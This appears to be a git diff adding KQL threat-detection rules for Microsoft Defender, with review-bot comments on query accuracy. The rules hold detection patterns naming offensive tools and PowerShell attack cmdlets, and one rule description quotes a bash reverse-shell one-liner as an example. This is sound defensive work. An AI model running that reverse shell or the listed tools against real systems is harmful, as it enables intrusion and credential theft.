+// Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate use of the JAMF CLI tool by IT support and administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "createAccount" or ProcessCommandLine contains "manage" or ProcessCommandLine contains "removeFramework" or ProcessCommandLine contains "removeMdmProfile" or ProcessCommandLine contains "resetPassword" or ProcessCommandLine contains "setComputerName") and FolderPath endswith "/jamf"
\ No newline at end of file
diff --git a/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql b/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql
new file mode 100644
index 00000000..27fa185e
--- /dev/null
+++ b/KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql
@@ -0,0 +1,12 @@
+// Title: JAMF MDM Potential Suspicious Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly
+
+DeviceProcessEvents
+| where (FolderPath endswith "/bash" or FolderPath endswith "/sh") and InitiatingProcessFolderPath endswith "/jamf"
\ No newline at end of file 
diff --git a/KQL/rules/Execution/java_running_with_remote_debugging.kql b/KQL/rules/Execution/java_running_with_remote_debugging.kql
new file mode 100644
index 00000000..c15627fc
--- /dev/null
+++ b/KQL/rules/Execution/java_running_with_remote_debugging.kql
@@ -0,0 +1,10 @@
+// Title: Java Running with Remote Debugging
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql b/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql
new file mode 100644
index 00000000..12d4123c
--- /dev/null
+++ b/KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql
@@ -0,0 +1,10 @@
+// Title: JXA In-memory Execution Via OSAScript
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects possible malicious execution of JXA in-memory via OSAScript
+// MITRE Tactic: Execution
+// Tags: attack.t1059.002, attack.t1059.007, attack.execution
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -l " and ProcessCommandLine contains "JavaScript") or ProcessCommandLine contains ".js") and (ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "eval" and ProcessCommandLine contains "NSData.dataWithContentsOfURL")
\ No newline at end of file 
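Review bot: The `(ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")` clause on the `| where` line ties the rule to the 1.x-era Java version naming, so a JVM installed under a newer `jdk-NN`-style path would not match even with `address=` bound to a non-loopback interface; this carries over from the source rule rather than being introduced here. Either replace that clause with an image check such as `FolderPath endswith "\\java.exe" or FolderPath endswith "/java"`, or record the limitation in the header with `// Note: only matches JRE/JDK 1.x install paths; newer JDK naming is not covered`. The loopback exclusion also omits IPv6; adding `or ProcessCommandLine contains "address=::1"` to the `not(...)` group is a cheap way to avoid flagging a debugger bound only to `::1`.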
diff --git a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
new file mode 100644
index 00000000..b9b0338a
--- /dev/null
+++ b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
@@ -0,0 +1,14 @@
+// Title: Kaspersky Endpoint Security Stopped Via CommandLine - Linux
+// Author: Milad Cheraghi
+// Date: 2025-10-18
+// Level: high
+// Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.
+This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - System administrator manually stopping Kaspersky services
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "stop" and ProcessCommandLine contains "kesl") and (FolderPath endswith "/systemctl" or FolderPath endswith "/bash" or FolderPath endswith "/sh")
\ No newline at end of file
diff --git a/KQL/rules/Execution/linux_hacktool_execution.kql b/KQL/rules/Execution/linux_hacktool_execution.kql
new file mode 100644
index 00000000..f8b705fa
--- /dev/null
+++ b/KQL/rules/Execution/linux_hacktool_execution.kql 
@@ -0,0 +1,12 @@
+// Title: Linux HackTool Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
+// Date: 2023-01-03
+// Level: high
+// Description: Detects known hacktool execution based on image name.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.resource-development, attack.t1587
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath contains "/cobaltstrike" or FolderPath contains "/teamserver") or (FolderPath endswith "/crackmapexec" or FolderPath endswith "/havoc" or FolderPath endswith "/merlin-agent" or FolderPath endswith "/merlinServer-Linux-x64" or FolderPath endswith "/msfconsole" or FolderPath endswith "/msfvenom" or FolderPath endswith "/ps-empire server" or FolderPath endswith "/ps-empire" or FolderPath endswith "/sliver-client" or FolderPath endswith "/sliver-server" or FolderPath endswith "/Villain.py") or (FolderPath endswith "/aircrack-ng" or FolderPath endswith "/bloodhound-python" or FolderPath endswith "/bpfdos" or FolderPath endswith "/ebpfki" or FolderPath endswith "/evil-winrm" or FolderPath endswith "/hashcat" or FolderPath endswith "/hoaxshell.py" or FolderPath endswith "/hydra" or FolderPath endswith "/john" or FolderPath endswith "/ncrack" or FolderPath endswith "/nxc-ubuntu-latest" or FolderPath endswith "/pidhide" or FolderPath endswith "/pspy32" or FolderPath endswith "/pspy32s" or FolderPath endswith "/pspy64" or FolderPath endswith "/pspy64s" or FolderPath endswith "/setoolkit" or FolderPath endswith "/sqlmap" or FolderPath endswith "/writeblocker") or FolderPath contains "/linpeas" or (FolderPath endswith "/autorecon" or FolderPath endswith "/httpx" or FolderPath endswith "/legion" or FolderPath endswith "/naabu" or FolderPath endswith "/netdiscover" or FolderPath endswith "/nuclei" or FolderPath endswith "/recon-ng") or FolderPath contains "/sniper" or (FolderPath endswith "/dirb" or FolderPath endswith "/dirbuster" or FolderPath endswith 
"/eyewitness" or FolderPath endswith "/feroxbuster" or FolderPath endswith "/ffuf" or FolderPath endswith "/gobuster" or FolderPath endswith "/wfuzz" or FolderPath endswith "/whatweb") or (FolderPath endswith "/joomscan" or FolderPath endswith "/nikto" or FolderPath endswith "/wpscan")
\ No newline at end of file
diff --git a/KQL/rules/Execution/linux_reverse_shell_indicator.kql b/KQL/rules/Execution/linux_reverse_shell_indicator.kql
new file mode 100644
index 00000000..e5fc34bb
--- /dev/null
+++ b/KQL/rules/Execution/linux_reverse_shell_indicator.kql
@@ -0,0 +1,10 @@
+// Title: Linux Reverse Shell Indicator
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-16
+// Level: critical
+// Description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "/bin/bash" and (not((RemoteIP in~ ("127.0.0.1", "0.0.0.0"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/local_file_read_using_curl_exe.kql b/KQL/rules/Execution/local_file_read_using_curl_exe.kql
new file mode 100644
index 00000000..3c3dfdb4
--- /dev/null
+++ b/KQL/rules/Execution/local_file_read_using_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: Local File Read Using Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file 
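Review bot: In `linux_reverse_shell_indicator.kql` the loopback exclusion on the `| where` line lists only IPv4 addresses, so a bash process connecting to `::1` is still flagged although the rule otherwise treats loopback as benign; `RemoteIP in~ ("127.0.0.1", "0.0.0.0", "::1")` closes that gap. Because the rule fires on every other outbound connection initiated by bash, expect noise from package managers and scripted downloads run from a bash parent; unlike its neighbours the header has no False Positives section, and `// False Positives:` followed by `// - Scripts run from bash that legitimately open network connections` would give tuners a starting point. The typo `contecting` in the description is inherited from the source rule and cannot be fixed in the hunk itself.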
diff --git a/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql b/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql
new file mode 100644
index 00000000..2f25ae74
--- /dev/null
+++ b/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql
@@ -0,0 +1,10 @@
+// Title: Logged-On User Password Change Via Ksetup.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-06
+// Level: medium
+// Description: Detects password change for the logged-on user's via "ksetup.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql b/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql
new file mode 100644
index 00000000..ef949b8f
--- /dev/null
+++ b/KQL/rules/Execution/macos_scripting_interpreter_applescript.kql
@@ -0,0 +1,12 @@
+// Title: MacOS Scripting Interpreter AppleScript
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-21
+// Level: medium
+// Description: Detects execution of AppleScript of the macOS scripting language AppleScript.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002
+// False Positives:
+// - Application installers might contain scripts as part of the installation process.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -e " or ProcessCommandLine contains ".scpt" or ProcessCommandLine contains ".js") and FolderPath endswith "/osascript"
\ No newline at end of file
diff --git a/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql b/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql
new file mode 100644
index 00000000..37f72b9e
--- /dev/null 
+++ b/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql 
@@ -0,0 +1,10 @@
+// Title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
+// Author: John Lambert (rule)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains "lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains 
"AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql
new file mode 100644
index 00000000..ae7cddf5
--- /dev/null
+++ b/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql 
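Review bot: KQL `contains` is case-insensitive, but every indicator on the `| where` line is a base64 fragment in which letter case is significant, so the case-folded match is broader than the encoded keyword it stands for and can hit unrelated base64 payloads. If exact-case matching is the intent (the source rule's default semantics are also case-insensitive, so this is a judgement call), `contains_cs` is the case-sensitive form, e.g. `ProcessCommandLine contains_cs "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA"`, applied to each fragment; the ` hidden ` term and the image/OriginalFileName checks should stay case-insensitive. Whichever is chosen, a header comment such as `// Note: base64 indicators are matched case-insensitively (KQL contains)` would make the behaviour explicit to whoever tunes this rule. The `| where` line begins on the previous chunk of this hunk.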
@@ -0,0 +1,10 @@
+// Title: Malicious PowerShell Commandlets - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: high
+// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or 
ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or 
ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or 
ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine 
contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or 
ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
diff --git a/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql b/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql
new file mode 100644
index 00000000..4cfbdda0
--- /dev/null
+++ b/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql 
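Review bot: The `| where` clause of `malicious_powershell_commandlets_processcreation.kql` is a single line of well over two hundred `ProcessCommandLine contains` alternatives, which is hard to review or diff whenever one name is added or removed. The obvious KQL-idiomatic rewrite (a `let` list plus `has_any`) is not a drop-in replacement because `has_any` is term-based rather than substring-based and would change matching for entries such as `"powercat "` (trailing space) or `"Get-System"`, so the safe style-only change is to keep `contains` and break the chain one alternative per line with each `or` starting a new line, which KQL permits inside an expression. A header comment naming the upstream list this was generated from, e.g. `// Source: <upstream Sigma rule id>` (placeholder), would tell maintainers where to sync from when the set changes. The `| where` line spans several chunks of this hunk.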
@@ -0,0 +1,10 @@
+// Title: Malicious PowerShell Scripts - FileCreation
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
+// Date: 2018-04-07
+// Level: high
+// Description: Detects the creation of known offensive powershell scripts used for exploitation
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath
